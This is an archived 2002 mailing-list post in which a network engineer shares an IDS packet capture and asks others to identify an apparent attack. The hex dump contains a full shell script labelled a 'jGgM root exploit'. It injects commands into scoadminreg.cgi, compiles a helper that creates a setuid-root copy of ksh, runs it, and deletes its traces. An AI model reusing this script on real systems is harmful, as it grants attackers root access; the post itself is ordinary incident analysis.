Attempted Exploit

From: Josh Lutz (jlutz@ESIENT.com)
Date: 01/22/02

• Previous message: Mark Medici: "RE: win2k ports"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Tue, 22 Jan 2002 15:55:30 -0500
From: "Josh Lutz" <jlutz@ESIENT.com>
To: <security-basics@securityfocus.com>

I was scanning through my IDS logs when I came across the packet below.
As far as I can tell (and I am very new to this), it is attempting to
execute a CGI script called "scoadminreg.cgi." I suspect, though I
cannot find any supporting documentation, that there is an exploit of
scoadminreg.cgi. I could only find references to scoadminreg relating to
Allaire Spectra Webtop management app. After searching through the
archives, I found a notice from Allaire about a cross-site scripting
vulnerability <http://www.securityfocus.com/advisories/2090> . Is this
what I am looking at?
 
I know it attempts to compile scoadminreg.cgi as /temp/jggm, run jggm,
then remove the contents of the /tmp directory. I am not sure why it
would be attempting to compile scoadminreg.
 
I'd appreciate any feedback.
Thanks,
Josh
 
01/22-08:38:42.189324 xx.yy.151.26:44559 -> xxx.xxx.xxx.xxx:25
TCP TTL:51 TOS:0x0 ID:42681 IpLen:20 DgmLen:1297 DF
***AP*** Seq: 0xE3DE6905 Ack: 0xD94DD903 Win: 0x16D0 TcpLen: 20
74 20 61 64 64 20 6F 62 6A 65 63 74 20 20 28 29 t add object ()
0D 0D 0A 52 45 53 55 4C 54 3A 20 45 72 72 6F 72 ...RESULT: Error
3A 20 4F 62 6A 65 63 74 20 22 2E 2E 2E 2F 5F 65 : Object ".../_e
6E 73 2F 4F 72 67 22 20 61 6C 72 65 61 64 79 20 ns/Org" already
65 78 69 73 74 73 2E 0D 0D 0A 4C 6F 63 61 74 69 exists....Locati
6F 6E 3A 20 2F 77 65 62 74 6F 70 2F 77 65 62 74 on: /webtop/webt
6F 70 73 2F 65 6E 5F 55 53 2F 61 64 6D 69 6E 2F ops/en_US/admin/
73 63 6F 61 64 6D 69 6E 72 65 0D 0D 0A 67 45 72 scoadminre...gEr
72 6F 72 2E 68 74 6D 6C 0D 0D 0A 0D 0D 0A 53 75 ror.html......Su
63 63 65 73 73 2E 2E 2E 0D 0D 0A 23 20 69 64 0D ccess......# id.
0D 0A 75 69 64 3D 31 30 31 28 6D 65 61 72 65 65 ..uid=101(mearee
29 20 67 69 64 3D 31 28 6F 74 68 65 72 29 20 65 ) gid=1(other) e
75 69 64 3D 30 28 72 6F 6F 74 29 0D 0D 0A 23 20 uid=0(root)...#
0D 0D 0A 0D 0D 0A 49 74 20 63 61 6E 20 72 65 6D ......It can rem
6F 74 65 20 61 74 74 61 63 6B 2E 2E 2E 6D 61 79 ote attack...may
62 65 2E 2E 2E 20 3A 29 29 0D 0D 0A 0D 0D 0A 2D be... :))......-
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0D --------------..
0A 4B 6F 72 65 61 6E 20 53 65 63 75 72 69 74 79 .Korean Security
20 46 6F 72 75 6D 2E 0D 0D 0A 68 74 74 70 3A 2F Forum....http:/
2F 77 77 77 2E 66 6F 72 73 65 63 75 72 65 2E 63 /www.forsecure.c
6F 6D 0D 0D 0A 68 74 74 70 3A 2F 2F 77 77 77 2E om...http://www.
6E 65 74 65 6D 70 65 72 6F 72 2E 63 6F 6D 0D 0D netemperor.com..
0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .---------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
0D 0D 0A 0D 0D 0A 48 65 72 65 20 69 73 20 66 69 ......Here is fi
6C 65 2E 2E 2E 0D 0D 0A 0D 0D 0A 2D 2D 2D 2D 2D le.........-----
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0D 0A 23 21 2F 62 ---------...#!/b
69 6E 2F 73 68 0D 0D 0A 0D 0D 0A 43 43 3D 22 67 in/sh......CC="g
63 63 22 0D 0D 0A 53 43 4F 41 44 4D 49 4E 3D 2F cc"...SCOADMIN=/
6F 70 74 2F 77 65 62 74 6F 70 2F 62 69 6E 2F 69 opt/webtop/bin/i
33 75 6E 30 32 31 32 2F 63 67 69 2D 0D 0D 0A 62 3un0212/cgi-...b
69 6E 2F 61 64 6D 69 6E 2F 73 63 6F 61 64 6D 69 in/admin/scoadmi
6E 72 65 67 2E 63 67 69 0D 0D 0A 0D 0D 0A 23 0D nreg.cgi......#.
0D 0A 23 0D 0D 0A 23 0D 0D 0A 23 0D 0D 0A 0D 0D ..#...#...#.....
0A 65 63 68 6F 0D 0D 0A 65 63 68 6F 20 22 6A 47 .echo...echo "jG
67 4D 20 72 6F 6F 74 20 65 78 70 6C 6F 69 74 22 gM root exploit"
0D 0D 0A 65 63 68 6F 20 22 68 74 74 70 3A 2F 2F ...echo "http://
77 77 77 2E 6E 65 74 65 6D 70 65 72 6F 72 2E 63 www.netemperor.c
6F 6D 2F 22 0D 0D 0A 65 63 68 6F 0D 0D 0A 65 63 om/"...echo...ec
68 6F 20 22 4D 61 69 6C 3A 20 6A 67 67 6D 40 6D ho "Mail: jggm@m
61 69 6C 2E 63 6F 6D 22 0D 0D 0A 65 63 68 6F 0D ail.com"...echo.
0D 0A 0D 0D 0A 69 66 20 5B 20 21 20 2D 78 20 24 .....if [ ! -x $
53 43 4F 41 44 4D 49 4E 20 5D 3B 20 74 68 65 6E SCOADMIN ]; then
0D 0D 0A 20 20 20 65 63 68 6F 20 22 24 53 43 4F ... echo "$SCO
41 44 4D 49 4E 20 66 69 6C 65 20 6E 6F 74 20 66 ADMIN file not f
6F 75 6E 64 22 0D 0D 0A 20 20 20 65 78 69 74 20 ound"... exit
32 3B 0D 0D 0A 66 69 0D 0D 0A 0D 0D 0A 63 61 74 2;...fi......cat
20 3E 2F 74 6D 70 2F 6A 67 67 6D 2E 63 20 3C 3C >/tmp/jggm.c <<
5F 45 4F 46 0D 0D 0A 0D 0D 0A 6D 61 69 6E 28 29 _EOF......main()
0D 0D 0A 7B 0D 0D 0A 20 20 20 73 65 74 75 69 64 ...{... setuid
28 30 29 3B 0D 0D 0A 20 20 20 73 65 74 67 69 64 (0);... setgid
28 30 29 3B 0D 0D 0A 20 20 20 63 68 6F 77 6E 28 (0);... chown(
22 2F 74 6D 70 2F 6A 47 67 4D 5F 53 68 65 6C 6C "/tmp/jGgM_Shell
22 2C 20 30 2C 20 30 29 3B 0D 0D 0A 20 20 20 63 ", 0, 0);... c
68 6D 6F 64 28 22 2F 74 6D 70 2F 6A 47 67 4D 5F hmod("/tmp/jGgM_
53 68 65 6C 6C 22 2C 20 30 34 37 35 35 29 3B 0D Shell", 04755);.
0D 0A 7D 0D 0D 0A 5F 45 4F 46 0D 0D 0A 0D 0D 0A ..}..._EOF......
63 70 20 2F 62 69 6E 2F 6B 73 68 20 2F 74 6D 70 cp /bin/ksh /tmp
2F 6A 47 67 4D 5F 53 68 65 6C 6C 0D 0D 0A 24 43 /jGgM_Shell...$C
43 20 2D 6F 20 2F 74 6D 70 2F 6A 67 67 6D 20 2F C -o /tmp/jggm /
74 6D 70 2F 6A 67 67 6D 2E 63 0D 0D 0A 0D 0D 0A tmp/jggm.c......
24 53 43 4F 41 44 4D 49 4E 20 22 2D 63 20 2F 74 $SCOADMIN "-c /t
6D 70 2F 6A 67 67 6D 3B 2F 74 6D 70 2F 6A 67 67 mp/jggm;/tmp/jgg
6D 3B 22 0D 0D 0A 0D 0D 0A 72 6D 20 2D 72 66 20 m;"......rm -rf
2F 74 6D 70 2F 6A 67 67 6D 20 2F 74 6D 70 2F 6A /tmp/jggm /tmp/j
67 67 6D 2E 63 0D 0D 0A 0D 0D 0A 2F 74 6D 70 2F ggm.c....../tmp/
6A 47 67 4D 5F 53 68 65 6C 6C 0D 0D 0A 0D 0D 0A jGgM_Shell......
23 20 65 6E 64 20 6F 66 20 66 69 6C 65 2E 2E 0D # end of file...
0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ..--------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 0D 0D 0A 2E 0D 0A ---......
---------------------------------------------
Joshua Lutz
Network Engineer, ESI Enterprises, Inc.
1188 Centre Street
Newton Centre MA 02459
p. 617.527.4343 x107
f. 617.527.3303
e. jlutz@esient.com
 

---

• Previous message: Mark Medici: "RE: win2k ports"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > security-basics  > 2002-01